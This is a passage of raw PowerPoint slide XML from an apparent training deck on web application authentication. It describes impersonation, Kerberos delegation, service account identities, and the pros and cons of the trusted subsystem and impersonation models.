          <a:prstGeom prst="uturnArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 43750"/>
              <a:gd name="adj5" fmla="val 9285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tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="Picture 68" descr="D:\Aeshen\TechNet 2006\12-December\Msft-longhorn-papers\TDM Deck\Windows Illustration Icons\Internet.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3894489" y="2100706"/>
            <a:ext cx="571505" cy="571504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Picture 69" descr="server.emf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503260" y="1314888"/>
            <a:ext cx="717771" cy="1071570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Picture 22" descr="Blue Embossed Cylinder"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7816206" y="1967538"/>
            <a:ext cx="549382" cy="721821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Rectangle 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571472" y="2500306"/>
            <a:ext cx="1061509" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88" name="Picture 11" descr="usr"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="819734" y="1954923"/>
            <a:ext cx="379515" cy="575652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="91" name="Group 90"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3673924" y="2420704"/>
            <a:ext cx="469448" cy="285752"/>
            <a:chOff x="3673924" y="2420704"/>
            <a:chExt cx="469448" cy="285752"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Flowchart: Preparation 91"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3673924" y="2420704"/>
              <a:ext cx="428628" cy="285752"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartPreparatio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de-DE" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="TextBox 92"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3690252" y="2453360"/>
              <a:ext cx="453120" cy="246221"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="1000" dirty="0"/>
                <a:t>WP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rounded Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5891428" y="2935284"/>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b="1" i="1" dirty="0">
                <a:latin typeface="Segoe"/>
              </a:rPr>
              <a:t>Remote access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Segoe"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Rounded Rectangle 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3270344" y="2935284"/>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GB" b="1" i="1" dirty="0">
                <a:latin typeface="Segoe"/>
              </a:rPr>
              <a:t>Local access</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Segoe"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Rounded Rectangle 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="649260" y="2935284"/>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b="1" dirty="0"/>
              <a:t>Identity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Rounded Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5885078" y="3295546"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rounded Rectangle 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3263994" y="3295546"/>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400">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="Rounded Rectangle 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="650284" y="3302920"/>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t>Network Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Rounded Rectangle 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5892452" y="3670770"/>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t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Rounded Rectangle 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3271368" y="3670770"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rounded Rectangle 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="650284" y="3670770"/>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t>Local Service</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Rounded Rectangle 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5886102" y="4038406"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rounded Rectangle 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3265018" y="4038406"/>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t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Rounded Rectangle 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="651308" y="4038406"/>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t>Local System</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Rounded Rectangle 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5886102" y="4409066"/>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GB" dirty="0"/>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Rounded Rectangle 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3265018" y="4409066"/>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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Rounded Rectangle 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="643934" y="4409066"/>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err="1"/>
              <a:t>ApplicationPoolIdentity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rounded Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5885478" y="4786610"/>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GB" dirty="0"/>
              <a:t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Rounded Rectangle 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3264394" y="4786610"/>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t>John Doe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Rounded Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="643310" y="4786610"/>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t>Dom Account: WEB1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Rectangle 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835696" y="1980129"/>
            <a:ext cx="1702164" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows Integrated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>(Impersonation and Kerberos Delegation)</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Content Placeholder 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539750" y="5293657"/>
            <a:ext cx="8675720" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="274320" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId8"/>
              </a:buBlip>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="548640" lvl="1" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="75000"/>
              <a:buFontTx/>
              <a:buBlip>
                <a:blip r:embed="rId8"/>
              </a:buBlip>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="822960" lvl="2" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1097280" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1371600" indent="-274320" defTabSz="914363">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="5191CD"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Segoe" charset="0"/>
              <a:buChar char="–"/>
              <a:defRPr sz="2200">
                <a:latin typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"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a:t>The web site does impersonate the user‘s identity so user’s account is used to local access. As Kerberos Delegation is enabled remote access is also done with the user’s account.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="358389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100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wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>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ipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="14"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8" grpId="0" animBg="1"/>
      <p:bldP spid="6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Authentication and Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3924151"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusted Subsystem Model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application accesses resources using a fixed identity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pros: Scalability, minimal back-end ACL management, no direct data access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cons: No auditing at the backend, increased risk from server compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Impersonation Model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application uses the users identity to access resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pros: Auditing across tiers, granular access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cons: Scalability, increased administration effort</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Kerberos Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148576" y="5844276"/>
            <a:ext cx="2714643" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Where does he </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>have access to?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1687286" y="5842515"/>
            <a:ext cx="2308138" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Who is it?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="server.emf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4096358" y="5188320"/>
            <a:ext cx="717771" cy="1071570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Right Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1596028" y="5615462"/>
            <a:ext cx="2490806" cy="248514"/>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9" name="Picture 10" descr="Desktop PC"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="881648" y="5464396"/>
            <a:ext cx="714380" cy="859865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 11" descr="usr"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="819734" y="5825685"/>
            <a:ext cx="379515" cy="575652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 22" descr="Blue Embossed Cylinder"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4409304" y="5840970"/>
            <a:ext cx="549382" cy="721821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Right Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
